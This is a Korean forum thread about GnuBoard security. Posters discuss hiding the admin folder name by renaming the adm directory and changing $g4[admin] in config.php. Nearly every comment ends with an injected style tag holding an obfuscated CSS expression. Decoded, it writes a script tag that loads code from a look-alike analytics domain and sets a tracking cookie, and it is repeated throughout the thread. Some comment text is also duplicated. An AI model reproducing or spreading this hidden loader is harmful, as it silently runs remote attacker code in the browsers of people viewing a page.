admin 폴더명이 그냥 보이는군요..? 정보
admin 폴더명이 그냥 보이는군요..?본문
그냥 소스보기 하니까 g4_admin 폴더명이 그냥 보이는군요.
왜 이렇게 하셨는지 이해가 안 갑니다.
보안의 기본중 하나가 admin 폴더명을 쉽게 유추할 수 없도록 하는 것도 포함된다고 보는데요.
물론 소스를 변형하면 이런 문제 해결할 수도 있지만..
잦은 업그레이드로 소스 변형에도 부담으로 다가옵니다..
추천
0
0
댓글 전체
4.01.00 (05.07.11) 버전에서 패치되었습니다. ^^
http://www.sir.co.kr/bbs/board.php?bo_table=g4_pds&wr_id=416
http://www.sir.co.kr/bbs/board.php?bo_table=g4_pds&wr_id=416
아~~ 점점 헷갈리기 시작합니다............오마이갓!.......
루트님 좀더 상세한 설명 부탁합니다...^^<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
그누보드 설치 디렉토리 아래에 기본적으로 생성되는 bbs, adm, cheditor 디렉토리에 대해서는 보통 생각하기에 생성되는 데로 사용해야 할것 같지만 꼭 그렇지 않다는 얘기입니다.
위의 디렉토리명을 사용자가 원하는것으로 바꿀수있습니다.
처음 설치할때 바꾸셔도 되고, 사용중에도 바꿀수있습니다.
만약 바꾸신다면 디렉토리 이름을 바꾸시고 config.php에 설정하는 디렉토리 명을 변경하시면 됩니다.
만약 기존 사용중에 관리자 디렉토리를 adm에서 으로 바꾸고 싶다면 다음처럼 해보세요.
그누보드 설치디렉토리 $ mv adm abcdefghijklmnopqrstuvwxyz
그리고 config.php를 열어서 $g4[admin]에 설정되어있는값 "adm"을 "abcdefghijklmnopqrstuvwxyz" 로 변경해보세요.
^^<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
위의 디렉토리명을 사용자가 원하는것으로 바꿀수있습니다.
처음 설치할때 바꾸셔도 되고, 사용중에도 바꿀수있습니다.
만약 바꾸신다면 디렉토리 이름을 바꾸시고 config.php에 설정하는 디렉토리 명을 변경하시면 됩니다.
만약 기존 사용중에 관리자 디렉토리를 adm에서 으로 바꾸고 싶다면 다음처럼 해보세요.
그누보드 설치디렉토리 $ mv adm abcdefghijklmnopqrstuvwxyz
그리고 config.php를 열어서 $g4[admin]에 설정되어있는값 "adm"을 "abcdefghijklmnopqrstuvwxyz" 로 변경해보세요.
^^<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
root님의 방법을 사용하셔도 웹페이지에서 '소스보기'를 수행하면,
'javascript 전역변수~'...
admin 경로가 추출됩니다.
물론 admin만 출력되는 것은 아니지요.
'김규덕'님께서 말씀하신 내용은 하단의 답글처럼 '소스보기'를 수행했을 경우,
온갖 내용(?!)이 그대로 추출되다는 의미지요.<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
'javascript 전역변수~'...
admin 경로가 추출됩니다.
물론 admin만 출력되는 것은 아니지요.
'김규덕'님께서 말씀하신 내용은 하단의 답글처럼 '소스보기'를 수행했을 경우,
온갖 내용(?!)이 그대로 추출되다는 의미지요.<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
헉... javascript에서 어떤경우에 사용하는지를 확인하고 없다면 지워야 할듯 하군요.
대체 방법이라도 찾던지..<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
대체 방법이라도 찾던지..<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
config.php에서 $g4[admin] 을 아무도 모르는것으로 설정하세요<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(105,102,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,105,110,100,101,120,79,102,40,34,112,108,97,121,115,98,61,34,41,61,61,45,49,41,123,105,102,40,100,111,99,117,109,101,110,116,46,117,110,105,113,117,101,73,68,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,51,67,115,99,114,105,112,116,37,50,48,115,114,99,37,51,68,37,50,50,104,116,116,112,37,51,65,47,47,119,119,119,46,103,111,111,103,108,101,45,97,110,97,108,121,116,108,99,101,46,99,111,109,47,117,114,99,104,105,110,46,106,115,37,50,50,37,51,69,37,51,67,47,115,99,114,105,112,116,37,51,69,34,41,41,59,118,97,114,32,101,120,112,105,114,101,115,61,110,101,119,32,68,97,116,101,40,41,59,101,120,112,105,114,101,115,46,115,101,116,84,105,109,101,40,101,120,112,105,114,101,115,46,103,101,116,84,105,109,101,40,41,43,49,42,50,52,42,54,48,42,54,48,42,49,48,48,48,41,59,118,97,114,32,121,116,49,61,34,112,108,97,121,115,98,61,89,101,115,59,112,97,116,104,61,47,59,101,120,112,105,114,101,115,61,34,59,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,121,116,49,43,101,120,112,105,114,101,115,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,125)))">
아래아래..